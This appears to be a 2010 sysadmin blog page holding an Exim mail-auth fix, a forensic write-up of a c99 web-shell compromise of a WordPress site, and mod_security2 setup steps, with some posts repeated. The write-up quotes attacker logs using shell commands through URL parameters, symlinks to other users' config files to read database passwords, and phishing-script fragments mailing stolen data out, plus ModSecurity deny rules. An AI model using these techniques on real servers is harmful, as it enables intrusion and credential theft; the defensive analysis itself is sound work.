webmail (SquirrelMail) was showing the following error when sending email:
-----------
Unknown response
435 Unable to authenticate at present
------------
solution
/scripts/mailperm --allaccounts --verbose
http://forums.cpanel.net/f5/email-exim-shadow-file-issue-150753.html
Wednesday, December 15, 2010
Monday, December 13, 2010
c99.php related hack prevention
A hacking attempt. How to get clue from logs files.
A user complaints his site is hacked.
The issue happened on the server as a part of a file named phxdomain.php that was residing on the folder /home/username/www/word. This folder is a wordpress installation.
This phxdomain.php contained a c99 type script called "Egy Spider". This file was uploaded on May 11. Logs for this is not present on the server.
See how hacker hacked domain.net.
He took the page http://domain.net/word/phxdomain.php in the browser.
79.176.202.245 - - [01/Jun/2010:12:48:12 -0400] "GET /word/phxdomain.php HTTP/1.1" 200 106040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
Uploaded hacker the script cp0.php
79.176.202.245 - - [01/Jun/2010:12:48:42 -0400] "POST /word/phxdomain.php HTTP/1.1" 200 106107 "http://domain.net/word/phxdomain.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
root@server [/home/username/www/word]# cat cp0.php
/home/user3/public_html/cofiguration.php
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
lrwxrwxrwx 1 username username 1 Jun 1 12:51 dd.txt -> //
-rw-r--r-- 1 username username 1259 Jun 1 13:29 error_log
-rw-r--r-- 1 username username 76828 Jun 1 13:16 page1-help.php
root@server [/home/username/www/word]
lrwxrwxrwx 1 username username 36 Jun 1 13:29 ip.txt -> /home/crum/public_html/wp-config.php
lrwxrwxrwx 1 username username 36 Jun 1 13:28 ip -> /home/crum/public_html/wp-config.php
-rw-r--r-- 1 username username 1375 Jun 1 12:54 way.pl
-rw-r--r-- 1 username username 153213 Jun 1 12:51 ss.php
-rw-r--r-- 1 username username 13061 Jun 1 12:48 cp0.php
root@server [/home/username/www]
-rw-r--r-- 1 username username 872 Jun 2 05:09 dest1.php
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
-rw------- 1 username username 16043 Jun 2 05:06 allia.htm
-rw------- 1 username username 16274 Jun 2 05:06 alli.htm
How do we find out, how the dest1.php was uploaded to the server and when ???
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
Note the time it was uploaded 05:09 on Jun 2
From logs we get this. images.php is a c99 script
41.217.65.13 - - [02/Jun/2010:05:09:30 -0400] "POST /word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10342 "http://comphubcaps.net/word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
By the above act he uploaded files urllist.txt, allia.htm and dest.php. After that he took urllist.txt and allia.htm in the browser.
41.217.65.13 - - [02/Jun/2010:05:09:37 -0400] "GET /urllist.txt HTTP/1.1" 200 5283 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
41.217.65.13 - - [02/Jun/2010:05:10:04 -0400] "GET /allia.htm HTTP/1.1" 200 16043 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
After that he used dest.php to perform a POST operation using dest.php
41.217.65.13 - - [02/Jun/2010:05:10:18 -0400] "POST /dest.php HTTP/1.1" 302 - "http://comphubcaps.net/allia.htm" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
How can we confirm?
See the time and date.
02/Jun/2010:05:09:30 -0400 ---> Jun 2 05:09 dest.php
Other details:
These are all hack related files. See some of the contents below.
===========================================================
root@server [/home/username/www]# cat dest.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: alli.htm");
?>
root@server [/home/username/www]# cat dest1.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: http://www.alliance-leicester.co.uk/securedloansrfs/index.asp?page=home&ct=primarymenuDetallePie");
===========================================================
Solution applied on server:
The issue here is that using the c99 scripts once can use the bash commands from the browser. It involves the basic commands passed as parameters to the script from the url. See example of "ls /home/username/public_html/" taken through url by the hacker.
41.217.65.13 - - [02/Jun/2010:05:05:43 -0400] "GET /word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10153 "http://domain.net/word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2Fword%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
To prevent this we can add modesec rules to block the request that contain words such as home, public_html, etc and common commands. This would block attempting these kind of attacks. But these may affect legitimate users from accessing the urls. Eg below
There can be cases where the word "ln" will be added to the modsec and if a user takes url such as /lincoln whicn contain the word "ln" In these cases remove the rule SecRule REQUEST_URI "ln" "deny,log,status:406"
As a work around we can block in the modsec as follows.
Notice that php?act= is used here. So we can use a modsec rule as follows which will prevent such attacks.
SecRule REQUEST_URI "\.php\?act=ls" "deny,log,status:406"
Similary check what all "act" he has used. Read below.
He uploaded a c99 similar shell named page1-help.php
He created links to the other accounts db conf files. He will get db user and pasword from this file.
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
See here.
root@server [/home/username/www/word/ss]# grep password /home/user3/public_html/configuration.php
var $password = 'XXXXYYYXXXYYY';
root@server [/home/hubcaps/www/word/ss]# grep user /home/user3/public_html/configuration.php
var $user = 'user3_db12';
Now see how he used the page1-help.php to view/change database details of the account user3 as follows from the browser.
213.6.206.137 - - [01/Jun/2010:13:21:45 -0400] "GET /word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=XXXXYYYXXXYYY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_db=user3_NorthpawJooma&sql_tbl=jos_users HTTP/1.1" 200 7481 "http://domain.net/word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=g:EbtBW%3EH-Yc9zHNWX$nwEpWvjK-CLY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_tbl=jos_users&sql_act=tbldump&thistbl=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Agian another "act" was used here, act=sql. We can block multiple "act" as follows.
SecRule REQUEST_URI "\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)" "deny,log,status:406"
By adding more commands that the hacker may use, we can prevent the execution of the commands using c99 shell.
SecRule REQUEST_URI "\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)" "deny,log,status:406"
A user complaints his site is hacked.
The issue happened on the server as a part of a file named phxdomain.php that was residing on the folder /home/username/www/word. This folder is a wordpress installation.
This phxdomain.php contained a c99 type script called "Egy Spider". This file was uploaded on May 11. Logs for this is not present on the server.
See how hacker hacked domain.net.
He took the page http://domain.net/word/phxdomain.php in the browser.
79.176.202.245 - - [01/Jun/2010:12:48:12 -0400] "GET /word/phxdomain.php HTTP/1.1" 200 106040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
Uploaded hacker the script cp0.php
79.176.202.245 - - [01/Jun/2010:12:48:42 -0400] "POST /word/phxdomain.php HTTP/1.1" 200 106107 "http://domain.net/word/phxdomain.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
root@server [/home/username/www/word]# cat cp0.php
/home/user3/public_html/cofiguration.php
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
lrwxrwxrwx 1 username username 1 Jun 1 12:51 dd.txt -> //
-rw-r--r-- 1 username username 1259 Jun 1 13:29 error_log
-rw-r--r-- 1 username username 76828 Jun 1 13:16 page1-help.php
root@server [/home/username/www/word]
lrwxrwxrwx 1 username username 36 Jun 1 13:29 ip.txt -> /home/crum/public_html/wp-config.php
lrwxrwxrwx 1 username username 36 Jun 1 13:28 ip -> /home/crum/public_html/wp-config.php
-rw-r--r-- 1 username username 1375 Jun 1 12:54 way.pl
-rw-r--r-- 1 username username 153213 Jun 1 12:51 ss.php
-rw-r--r-- 1 username username 13061 Jun 1 12:48 cp0.php
root@server [/home/username/www]
-rw-r--r-- 1 username username 872 Jun 2 05:09 dest1.php
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
-rw------- 1 username username 16043 Jun 2 05:06 allia.htm
-rw------- 1 username username 16274 Jun 2 05:06 alli.htm
How do we find out, how the dest1.php was uploaded to the server and when ???
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
Note the time it was uploaded 05:09 on Jun 2
From logs we get this. images.php is a c99 script
41.217.65.13 - - [02/Jun/2010:05:09:30 -0400] "POST /word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10342 "http://comphubcaps.net/word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
By the above act he uploaded files urllist.txt, allia.htm and dest.php. After that he took urllist.txt and allia.htm in the browser.
41.217.65.13 - - [02/Jun/2010:05:09:37 -0400] "GET /urllist.txt HTTP/1.1" 200 5283 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
41.217.65.13 - - [02/Jun/2010:05:10:04 -0400] "GET /allia.htm HTTP/1.1" 200 16043 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
After that he used dest.php to perform a POST operation using dest.php
41.217.65.13 - - [02/Jun/2010:05:10:18 -0400] "POST /dest.php HTTP/1.1" 302 - "http://comphubcaps.net/allia.htm" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
How can we confirm?
See the time and date.
02/Jun/2010:05:09:30 -0400 ---> Jun 2 05:09 dest.php
Other details:
These are all hack related files. See some of the contents below.
===========================================================
root@server [/home/username/www]# cat dest.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: alli.htm");
?>
root@server [/home/username/www]# cat dest1.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: http://www.alliance-leicester.co.uk/securedloansrfs/index.asp?page=home&ct=primarymenuDetallePie");
===========================================================
Solution applied on server:
The issue here is that using the c99 scripts once can use the bash commands from the browser. It involves the basic commands passed as parameters to the script from the url. See example of "ls /home/username/public_html/" taken through url by the hacker.
41.217.65.13 - - [02/Jun/2010:05:05:43 -0400] "GET /word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10153 "http://domain.net/word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2Fword%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
To prevent this we can add modesec rules to block the request that contain words such as home, public_html, etc and common commands. This would block attempting these kind of attacks. But these may affect legitimate users from accessing the urls. Eg below
There can be cases where the word "ln" will be added to the modsec and if a user takes url such as /lincoln whicn contain the word "ln" In these cases remove the rule SecRule REQUEST_URI "ln" "deny,log,status:406"
As a work around we can block in the modsec as follows.
Notice that php?act= is used here. So we can use a modsec rule as follows which will prevent such attacks.
SecRule REQUEST_URI "\.php\?act=ls" "deny,log,status:406"
Similary check what all "act" he has used. Read below.
He uploaded a c99 similar shell named page1-help.php
He created links to the other accounts db conf files. He will get db user and pasword from this file.
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
See here.
root@server [/home/username/www/word/ss]# grep password /home/user3/public_html/configuration.php
var $password = 'XXXXYYYXXXYYY';
root@server [/home/hubcaps/www/word/ss]# grep user /home/user3/public_html/configuration.php
var $user = 'user3_db12';
Now see how he used the page1-help.php to view/change database details of the account user3 as follows from the browser.
213.6.206.137 - - [01/Jun/2010:13:21:45 -0400] "GET /word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=XXXXYYYXXXYYY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_db=user3_NorthpawJooma&sql_tbl=jos_users HTTP/1.1" 200 7481 "http://domain.net/word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=g:EbtBW%3EH-Yc9zHNWX$nwEpWvjK-CLY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_tbl=jos_users&sql_act=tbldump&thistbl=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Agian another "act" was used here, act=sql. We can block multiple "act" as follows.
SecRule REQUEST_URI "\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)" "deny,log,status:406"
By adding more commands that the hacker may use, we can prevent the execution of the commands using c99 shell.
SecRule REQUEST_URI "\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)" "deny,log,status:406"
mod_security2 installation on apache2 and configuration(Linux)
Download and install modsec2
cd /usr/src/src
wget http://www.modsecurity.org/download/modsecurity-apache_2.5.12.tar.gz
tar -zxf modsecurity-apache_2.5.12.tar.gz
cd modsecurity-apache_2.5.12/apache2
./configure --with-apxs=/usr/local/apache/bin/apxs
make
make install
You can see the module mod_security2.so has been added to /usr/local/apache/modules/ directory.
Now we ned to configure modsec2. Create a file called /usr/local/apache/conf/modsec2.conf and enter the text below
vi /usr/local/apache/conf/modsec2.conf
LoadModule security2_module modules/mod_security2.so
<IfModule mod_security2.c>
SecRuleEngine On
# See http://www.modsecurity.org/documentation/ModSecurity-Migration-Matrix.pdf
# "Add the rules that will do exactly the same as the directives"
# SecFilterCheckURLEncoding On
# SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit.log
SecDebugLog logs/modsec_debug_log
SecDebugLogLevel 0
SecDefaultAction "phase:2,deny,log,status:406"
SecRule REMOTE_ADDR "^127.0.0.1$" nolog,allow
Include "/usr/local/apache/conf/modsec2.user.conf"
Include "/usr/local/apache/conf/apache2-modsec/rootkits.conf"
</IfModule>
You must add modsec rules to the files modsec2.user.conf and rootkits.conf. You can downoad rules from here.
http://www.gotroot.com/downloads/ftp/mod_security/2.0/apache2/
Add the following line inside httpd.conf file.
Include "/usr/local/apache/conf/modsec2.conf"
Check if the apache syntax is correct.
/etc/rc.d/init.d/httpd configtest
If syntax Ok, do a graceful restart of apache
/etc/rc.d/init.d/httpd graceful
To test, add the following rule to the file /usr/local/apache/conf/apache2-modsec/rootkits.conf and take the urls as below to see if it gives modsec error.
SecRule REQUEST_URI "/bin" "deny,log,status:406"
http://main_IP/bin
cd /usr/src/src
wget http://www.modsecurity.org/download/modsecurity-apache_2.5.12.tar.gz
tar -zxf modsecurity-apache_2.5.12.tar.gz
cd modsecurity-apache_2.5.12/apache2
./configure --with-apxs=/usr/local/apache/bin/apxs
make
make install
You can see the module mod_security2.so has been added to /usr/local/apache/modules/ directory.
Now we ned to configure modsec2. Create a file called /usr/local/apache/conf/modsec2.conf and enter the text below
vi /usr/local/apache/conf/modsec2.conf
LoadModule security2_module modules/mod_security2.so
<IfModule mod_security2.c>
SecRuleEngine On
# See http://www.modsecurity.org/documentation/ModSecurity-Migration-Matrix.pdf
# "Add the rules that will do exactly the same as the directives"
# SecFilterCheckURLEncoding On
# SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit.log
SecDebugLog logs/modsec_debug_log
SecDebugLogLevel 0
SecDefaultAction "phase:2,deny,log,status:406"
SecRule REMOTE_ADDR "^127.0.0.1$" nolog,allow
Include "/usr/local/apache/conf/modsec2.user.conf"
Include "/usr/local/apache/conf/apache2-modsec/rootkits.conf"
</IfModule>
You must add modsec rules to the files modsec2.user.conf and rootkits.conf. You can downoad rules from here.
http://www.gotroot.com/downloads/ftp/mod_security/2.0/apache2/
Add the following line inside httpd.conf file.
Include "/usr/local/apache/conf/modsec2.conf"
Check if the apache syntax is correct.
/etc/rc.d/init.d/httpd configtest
If syntax Ok, do a graceful restart of apache
/etc/rc.d/init.d/httpd graceful
To test, add the following rule to the file /usr/local/apache/conf/apache2-modsec/rootkits.conf and take the urls as below to see if it gives modsec error.
SecRule REQUEST_URI "/bin" "deny,log,status:406"
http://main_IP/bin
Subscribe to:
Posts (Atom)